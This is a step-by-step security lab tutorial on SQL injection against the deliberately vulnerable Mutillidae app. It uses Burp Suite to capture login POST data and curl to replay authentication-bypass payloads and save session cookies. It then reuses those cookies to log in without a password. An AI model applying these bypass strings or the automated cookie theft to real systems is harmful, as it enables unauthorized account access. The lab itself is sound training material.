(Mutillidae:
Lesson 6)
{ SQL Injection,
Burpsuite, cURL, Man-In-The-Middle Attack }
Section 0. Background
Information |
- What is Mutillidae?
- OWASP Mutillidae II is a free, open source,
deliberately vulnerable web-application providing a target for web-security
enthusiast.
- What is a SQL Injection?
- SQL injection (also known as SQL fishing) is a
technique often used to attack data driven applications.
- This is done by including portions of SQL
statements in an entry field in an attempt to get the website to pass a
newly formed rogue SQL command to the database (e.g., dump the database
contents to the attacker). SQL injection is a code injection technique that
exploits a security vulnerability in an application's software.
- The vulnerability happens when user input is
either incorrectly filtered for string literal escape characters embedded in
SQL statements or user input is not strongly typed and unexpectedly
executed. SQL injection is mostly known as an attack vector for websites but
can be used to attack any type of SQL database.
- What is a Man-In-The-Middle attack?
- The man-in-the-middle attack take on many
forms. The most common form is active network eavesdropping in which
the attacker is able to gain authentication credentials (Username, Password,
SESSIONID, Cookies Information, etc).
- What is cURL?
- cURL stands for "Client URL Request Library".
- This is a command line tool for getting or
sending files using URL syntax.
- It supports a range of common Internet
protocols, currently including HTTP, HTTPS, FTP, FTPS, SCP, SFTP, TFTP, LDAP,
LDAPS, DICT, TELNET, FILE, IMAP, POP3, SMTP and RTSP.
- (Damn Beautiful Tool in my opinion)
- What is Burp Suite?
- Burp Suite is a Java application that can
be used to secure or crack web applications. The suite consists of
different tools, such as a proxy server, a web spider, an intruder and a
so-called repeater, with which requests can be automated.
- When Burp suite is used as a proxy server
and a web browser uses this proxy server, it is possible to have control
of all traffic that is exchanged between the web browser and web
servers. Burp makes it possible to manipulate data before it is sent to
the web server.
- What is Cookie Manager+?
- Cookies manager to view, edit and create new
cookies. It also shows extra information about cookies, allows edit multiple
cookies at once and backup/restore them.
- Pre-Requisite Lab
-
Mutillidae: Lesson 1: How to Install Mutillidae in Fedora 14
- Note:
Remote database access has been turned on to provide an additional
vulnerability.
-
BackTrack: Lesson 1: Installing BackTrack 5 R1
- Note:
This is not absolutely necessary, but if you are a computer security
student or professional, you should have a BackTrack VM.
-
Mutillidae: Lesson 5: Manual SQL Injection with Firebug
- Note:
This lab does contains all the heavy lifting and shows detailed
explanations behind each exploit that will not be re-explained.
-
BackTrack: Lesson 10: How To Install Cookies Manager+ 1.5.2
-
Lab
Notes
- In this lab we will do the following:
- We will use the same SQL Injection
Vulnerabilities from the
Previous Lab.
- We will capture the encoded form POST
DATA submissions with Burp Suite.
- Then we will use the captured POST DATA
to launch the SQL Injection using curl. This is to illustrate
how unfortunately easy it would be at automate an SQL Injection
Attack.
- Finally, we will use the cookies from a
successful SQL Injection to authenticate into Mutillidae without a
password. Note, this is one of many types of a
man-in-the-middle attack.
- Legal Disclaimer
- As a condition of your use of this Web
site, you warrant to computersecuritystudent.com that you will not use
this Web site for any purpose that is unlawful or
that is prohibited by these terms, conditions, and notices.
- In accordance with UCC § 2-316, this
product is provided with "no warranties, either express or implied." The
information contained is provided "as-is", with "no guarantee of
merchantability."
- In addition, this is a teaching website
that does not condone malicious behavior of
any kind.
- Your are on notice, that continuing
and/or using this lab outside your "own" test environment
is considered
malicious and is against the law.
- © 2013 No content replication of any
kind is allowed without express written permission.
Section 1:
Configure Fedora14 Virtual Machine Settings |
- Start VMware Player
- Instructions
- For Windows 7
- Click Start Button
- Search for "vmware player"
- Click VMware Player
- For Windows XP
- Starts --> Programs --> VMware
Player
- Edit Fedora Mutillidae Virtual Machine Settings
- Instructions:
- Highlight Fedora14 - Mutillidae
- Click Edit virtual machine settings
- Edit Network Adapter
- Instructions:
- Highlight Network Adapter
- Select Bridged
- Click the OK Button
Section 2:
Login to Fedora14 - Mutillidae |
- Start Fedora14 VM Instance
- Instructions:
- Start Up VMWare Player
- Select Fedora14 - Mutillidae
- Play virtual machine
- Login to Fedora14 - Mutillidae
- Instructions:
- Login: student
- Password: <whatever you set
it to>.
-
Section 3:
Open Console Terminal and Retrieve IP Address |
- Start a Terminal Console
- Instructions:
- Applications --> Terminal
- Switch user to root
- Instructions:
- su - root
- <Whatever you set the root password to>
-
- Get IP Address
- Instructions:
- ifconfig -a
- Notes (FYI):
- As indicated below, my IP address is
192.168.1.111.
- Please record your IP address.
Section 4: Configure
BackTrack Virtual Machine Settings |
- Start VMware Player
- Instructions
- For Windows 7
- Click Start Button
- Search for "vmware player"
- Click VMware Player
- For Windows XP
- Starts --> Programs --> VMware
Player
- Edit the BackTrack5R1 VM
- Instructions:
- Select BackTrack5R1 VM
- Click Edit virtual machine settings
- Edit Virtual Machine Settings
- Instructions:
- Click on Network Adapter
- Click on the Bridged Radio button
- Click on the OK Button
Section 5: Play and
Login to BackTrack |
- Play the BackTrack5R1 VM
- Instructions:
- Click on the BackTrack5R1 VM
- Click on Play virtual machine
- Login to BackTrack
- Instructions:
- Login: root
- Password: toor or <whatever you changed
it to>.
-
- Bring up the GNOME
- Instructions:
- Type startx
-
Section 6:
Open Console Terminal and Retrieve IP Address |
- On BackTrack, Start up a terminal window
- Instructions:
- Click on the Terminal Window
- Obtain the IP Address
- Instructions:
- ifconfig -a
- Note(FYI):
- My IP address 192.168.1.109.
- In your case, it will probably be
different.
- This is the machine that will be use to
attack the victim machine (Metasploitable).
Section 7: Start Web
Browser Session to Mutillidae |
- On BackTrack, Open Firefox
- Instructions:
- Click on the Firefox Icon
- Notes (FYI):
- If FireFox Icon does not exist in the Menu
Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
- Open Mutillidae
- Notes (FYI):
- Replace
192.168.1.111
in the following URL --> http://192.168.1.111/mutillidae, with your
Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
- http://192.168.1.111/mutillidae
Section 8: Go To
Login Page |
- Go to Login
- Instructions:
- Click on Login / Register
Section 9: Configure
Firefox Proxy Settings |
- View Preferences
- Instructions:
- Edit --> Preferences
- Advanced Settings...
- Instructions:
- Click on the Advanced Icon
- Click on the Network Tab
- Click on the Setting... button
- Connection Settings
- Instructions:
- Click on Manual proxy configurations
- Type "127.0.0.1" in the HTTP Proxy Text
Box
- Type "8080" in the Port Text Box
- Check Use the proxy server for all
protocols
- Click OK
- Click Close
Section 10:
Configure Burpsuite Settings |
- Start Burp Suite
- Instructions:
- Applications --> BackTrack -->
Vulnerability Assessment --> Web Application Assessment ---> Web
Application Proxies --> burpsuite
- JRE Message
- Instructions:
- Click OK
- Configure proxy
- Instructions:
- Click on the proxy tab
- Click on the options tab
- Verify the port is set to 8080
- Turn on intercept
- Instructions:
- Click on the proxy tab
- Click on the intercept tab
- Verify the intercept button shows
"intercept is off"
Section 11: SQL
Injection: By-Pass Password Without Username (Obtain Access #1) |
- Login Without Password
- Instructions:
- Place the following in the Name Textbox
--> ' or
1=1--
- Make sure you put a space after the
"--
"
- Click the Login Button
- Note(FYI):
- The string
' or 1=1--
placed in the below query means the following:
- Search for username that is either
equal to nothing OR where 1 is equal to 1. So, we created a
condition that is always true (OR 1=1). The "--
" string is a comment in SQL. We used this trick to
comment out the rest of the SQL query (AND password=''), which
eliminates that password authentication.
- SELECT * FROM accounts WHERE
username=''
or 1=1-- ' AND password=''
- View Post Data (With Burp Suite)
- Instructions:
- Click on the Proxy Tab
- Click on the History Tab
- Click on the line that contains --> /mutillidae/index.php?page=login.php
- Click on the Request Tab
- Click on the Raw Tab
- View the Post Data String
- Later we will populate curl with
this POST data string.
- Note(FYI):
- username=%27+or+1%3D1--+&password=&login-php-submit-button=Login
-
%27 is a
single quote (')
-
+
is a space
-
%3D
is a equal sign (=)
Section 12: Simulate
CURL SQL Injection: (Obtain Access #1) |
- Logout of Session
- Instructions:
- Click Logout (See Picture)
- Use Curl to Login with POST Data
- Note(FYI):
- Replace
192.168.1.111 with Mutillidae's IP Address obtained from
(Section 3, Step 3).
- Instructions:
- curl -b crack_cookies.txt -c
crack_cookies.txt --user-agent "Mozilla/4.0 (compatible; MSIE 5.01;
Windows NT 5.0)" --data "username=%27+or+1%3D1--+&password=&login-php-submit-button=Login"
--location "http://192.168.1.111/mutillidae/index.php?page=login.php"
> login1.txt
- grep "Logged In" login1.txt
- cat crack_cookies.txt
- Note(FYI):
- This curl statement provides the
blueprint to automate SQL Injection attempts. Below is the form POST
Data we obtained from Burpsuite (Section 11, Step 2).
- --data "username=%27+or+1%3D1--+&password=&login-php-submit-button=Login"
- Notice that grep returns the positive
result string "Logged In Admin".
- The crack_cookies.txt file contains the
session cookies including the PHP session ID (PHPSESSID) and the UID
of the user admin.
Section 13: SQL
Injection: Single Quote Test On Password Field (Obtain Access
#2) |
- Inspect Password Box Element
- Instructions:
- Click Login/Register
- Name: samurai
- Password: Right Click
- Click the Inspect Element
- Edit Password Box Element
- Instructions:
- Replace the string "password" with the
word "text"
- After size=, replace the string "20"
with "50"
- After maxlength=, replace the string
"20" with "50"
- Minimize Firebug
- Apply Always True Test to Password Textbox
- Instructions:
- Name: samurai
- Password:
' or (1=1
and username='samurai')--
- Remember to put a space after the "--
".
- Click the Login Button
- Note(FYI):
- Notice the Password textbox is no
longer obfuscated and is now in plaintext
- View Post Data (With Burp Suite)
- Instructions:
- Click on the Proxy Tab
- Click on the History Tab
- Click on the line that contains --> /mutillidae/index.php?page=login.php
- Click on the Request Tab
- Click on the Raw Tab
- Highlight all the text and right click
- Click "Copy to File"
- Later we will populate curl with
this POST data string.
- Note(FYI):
- username=samurai&password=%27+or+%281%3D1+and+username%3D%27samurai%27%29--+&login-php-submit-button=Login
-
%27 is a
single quote (')
-
+
is a space
-
%28
is a left parenthesis
-
%29
is a right parenthesis
-
%3D
is a equal sign (=)
- Save File
- Instructions:
- Save In: root
- File Name: burp2.txt
- Click the Save Button
- View Post Data (With Burpsuite)
- Instructions:
- cd /root
- grep -i cookie burp2.txt
- grep -i username burp2.txt
- This is the form POST Data String.
- Logout of Session
- Instructions:
- Click Logout (See Picture)
- Close Firefox
Section 14: Simulate
cURL SQL Injection: (Obtain Access #2) |
- Use Curl to Login with POST Data
- Note(FYI):
- Replace
192.168.1.111 with Mutillidae's IP Address obtained from
(Section 3, Step 3).
- Instructions:
- rm crack_cookies.txt
- grep -i username burp2.txt
- This form POST Data string will be used
in the following command.
- curl -b crack_cookies.txt -c
crack_cookies.txt --user-agent "Mozilla/4.0 (compatible; MSIE 5.01;
Windows NT 5.0)" --data "username=samurai&password=%27+or+%281%3D1+and+username%3D%27samurai%27%29--+&login-php-submit-button=Login"
--location "http://192.168.1.111/mutillidae/index.php?page=login.php"
> login2.txt
- grep "Logged In" login2.txt
- cat crack_cookies.txt
- Note(FYI):
- This command provide the POST DATA
String. Take this string and place it in the next curl
command.
- This curl statement provides the
blueprint to automate SQL Injection attempts.
- Notice that grep returns the positive
result string "Logged In".
- The crack_cookies.txt file contains the
session cookies including the PHP session ID (PHPSESSID) and the UID
of the user admin.
Section 15: Restore
Firefox Original Proxy Configurations |
- On BackTrack, Open Firefox
- Instructions:
- Click on the Firefox Icon
- Notes (FYI):
- If FireFox Icon does not exist in the Menu
Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
- Firefox Preferences
- Instructions:
- Edit --> Preferences
- Advanced Settings...
- Instructions:
- Click on the Advanced Icon
- Click on the Network Tab
- Click on the Setting... button
- Connection Settings
- Instructions:
- Click on the No proxy radio button
- Click on the OK button
- Click on the Close button
Section 16: Simulate
Man-In-The-Middle Attack |
- Start Cookies Manager+
- Instructions:
- Tools --> Cookies Manager+
- Notes (FYI):
- Click
here to install Cookie Manager+ you have not already done so.
- Add Cookie Entry
- Instructions:
- Click the Add Button
- Add PHPSESSID Cookie Entry
- Note(FYI):
- Replace
nbag2jctr1p9vatb2g62pch8e2 with your PHPSESSID found in
crack_cookies.txt (See Below Picture).
- Replace
192.168.1.111 with Mutillidae's IP Address Host IP Address
obtained from (Section 3, Step 3).
- Instructions:
- Name: PHPSESSID
- Content:
nbag2jctr1p9vatb2g62pch8e2
- Host:
192.168.1.111
- Path: /
- Click the Save Button.
- Add Cookie Entry
- Instructions:
- Click the Add Button
- Add showhints Cookie Entry
- Note(FYI):
- Replace
192.168.1.111 with Mutillidae's IP Address Host IP Address
obtained from (Section 3, Step 3).
- Instructions:
- Name: showhints
- Content: 0
- Host:
192.168.1.111
- Path: /mutillidae/
- Click the Save Button
- Add Cookie Entry
- Instructions:
- Click the Add Button
- Add username Cookie Entry
- Note(FYI):
- Replace
192.168.1.111 with Mutillidae's IP Address Host IP Address
obtained from (Section 3, Step 3).
- Instructions:
- Name: username
- Content: samurai
- Host:
192.168.1.111
- Path: /mutillidae/
- Click the Save Button
- Add Cookie Entry
- Instructions:
- Click the Add Button
- Add uid Cookie Entry
- Note(FYI):
- Replace
192.168.1.111 with Mutillidae's IP Address Host IP Address
obtained from (Section 3, Step 3).
- Instructions:
- Name: uid
- Content: 6
- Host:
192.168.1.111
- Path: /mutillidae/
- Click the Save Button
- Click the Close Button
- Add uid Cookie Entry
- Note(FYI):
- Replace
192.168.1.111 with Mutillidae's IP Address Host IP Address
obtained from (Section 3, Step 3).
- Notice you will be automagically logged
in without a password. For this reason, it is extremely
important that session information is (1) not only encrypted, (2)
but also users logout after they finish their session.
- Instructions:
-
http://192.168.1.111/mutillidae/index.php
- Proof of Lab, (On a BackTrack Terminal)
- Instructions:
- cd /root
- ls -l login*
- cat crack_cookies.txt
- date
- echo "Your Name"
- Replace the string "Your Name" with
your actual name.
- e.g., echo "John Gray"
-
Proof of Lab Instructions
- Press both the <Ctrl> and <Alt> keys at
the same time.
- Do a <PrtScn>
- Paste into a word document
- Upload to Moodle
-
|
 
|